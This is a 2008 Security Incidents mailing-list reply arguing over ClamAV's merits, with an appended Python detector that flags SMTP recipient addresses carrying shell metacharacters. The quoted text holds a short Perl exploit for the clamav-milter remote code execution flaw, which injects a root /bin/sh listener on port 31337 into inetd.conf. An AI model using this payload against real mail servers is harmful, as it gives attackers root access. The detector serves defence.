Security Incidents mailing list archives

Re: Possible Mail server compromise ?


From: Eygene Ryabinkin <rea-sec () codelabs ru>
Date: Wed, 20 Feb 2008 17:48:10 +0300

Faas, good day.

Tue, Feb 19, 2008 at 07:46:35PM +0100, Faas M. Mathiasen wrote:
> ClamAV ? Lowest detection rate in the industry,

Possibly... Where are the statistics?

> no on-access scans

Not relevant to the mail scanning engine.

> and an Anti-virus that was vulnerable to such bugs [1]

Not ClamAV itself, but clamav-milter in blackhole mode.
http://www.nruns.com/advisories/[n.runs-SA-2007.025%5D%20-%20ClamAV%20Remote%20Code%20Execution%20Advisory.txt

> you consider a great success ? I don't know who you are protecting
> but I hope they were not vulnerable to this :
>
> [1]
> print $sock "ehlo you\r\n";
> print $sock "mail from: <>\r\n";
> print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root
> /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
> print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
> print $sock "data\r\n.\r\nquit\r\n";
-- 
Eygene
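
A defensive check for the recipient pattern in the quoted snippet, added here as an example and not part of the original message: it flags RCPT TO commands whose local part carries shell metacharacters. The function names, the character set and the sample session are assumptions constructed for illustration.

```python
import re

# Matches an SMTP RCPT command in any letter case and captures its argument.
RCPT_RE = re.compile(r'^\s*rcpt\s+to:\s*(.*)$', re.IGNORECASE)
# Characters a shell would interpret. A quoted local part may legally contain
# some of them, so a hit means "review this", not "invalid address".
META_RE = re.compile(r'\$\(|[|;&`<>]')

def envelope_address(arg):
    """Return the address from a RCPT argument, dropping any ESMTP parameters."""
    arg = arg.strip()
    if arg.startswith('<') and '>' in arg:
        # Cut at the LAST '>' so a '>' smuggled into the local part is kept.
        return arg[1:arg.rindex('>')]
    return arg.split()[0] if arg else ''

def suspicious_recipients(lines):
    """Return (line number, address, metacharacters found) per flagged RCPT."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = RCPT_RE.match(line)
        if not m:
            continue
        addr = envelope_address(m.group(1))
        local, _, _domain = addr.rpartition('@')
        found = sorted(set(META_RE.findall(local or addr)))
        if found:
            hits.append((lineno, addr, found))
    return hits

# Constructed sample session; the command text is a placeholder.
SAMPLE_SESSION = [
    'EHLO client.example',
    'MAIL FROM:<>',
    'RCPT TO:<alice@example.org>',
    'rcpt to: <nobody+"|CMD-PLACEHOLDER"@localhost>',
    'RCPT TO:<bob+lists@example.org>',
    'rcpt to: <nobody+"|CMD >> /tmp/placeholder"@localhost>',
    'DATA',
]

if __name__ == '__main__':
    for lineno, addr, found in suspicious_recipients(SAMPLE_SESSION):
        print(f'line {lineno}: {addr!r} contains {found}')
```

The same function can be pointed at MTA or milter logs once the RCPT lines are extracted from them.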

